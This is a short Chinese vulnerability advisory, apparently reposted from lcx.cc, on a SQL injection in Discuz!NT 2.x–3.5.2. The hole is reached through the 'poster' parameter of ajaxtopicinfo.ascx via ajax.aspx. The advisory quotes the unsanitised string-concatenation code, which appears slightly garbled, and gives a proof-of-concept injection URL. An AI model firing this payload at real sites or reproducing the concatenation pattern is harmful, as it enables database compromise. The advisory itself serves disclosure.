ajaxtopicinfo.ascx用户控件 poster SQL注入漏洞
结合ajax.aspx调用任意用户控件漏洞
在文件 admin/UserControls/ ajaxtopicinfo.ascx 中
转到函数 GetCondition (WebsiteManage.cs) //62 行 if (posterlist != “”) { string[] poster = posterlist.Split(‘,’); condition = ” AND [poster] in (“; string tempposerlist = “”; foreach (string p in poster) { tempposerlist = “‘” p “‘,”; } if (tempposerlist != “”) tempposerlisttempposerlist = tempposerlist.Substring(0, tempposerlist.Length – 1); condition = tempposerlist “)”; }
posterlist变量没有过滤直接进入SQL语句查询,造成SQL注入
测试方法:
http://localhost:25594/admin/ajax.aspx?AjaxTemplate=ajaxtopicinfo.ascx&poster=1′)
字符串 ‘) AND [tid]>=1 AND [tid]
由于错误信息被隐藏了,但SQL语句会被执行的。文章来源于lcx.cc:Discuz!NT 2.x – 3.5.2 用户控件 poster SQL 注入漏洞
相关推荐: ElasticSearch Groovy 脚本远程代码执行漏洞分析(CVE-2015-1427)
作者:Lupin @ 京东安全应急响应中心 日期:2015-3-3 ElasticSearch是一个JAVA开发的搜索分析引擎。2014年,曾经被曝出过一个远程代码执行漏洞(CVE-2014-3120),漏洞出现在脚本查询模块,由于搜索引擎支持使用脚本代码(M…
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论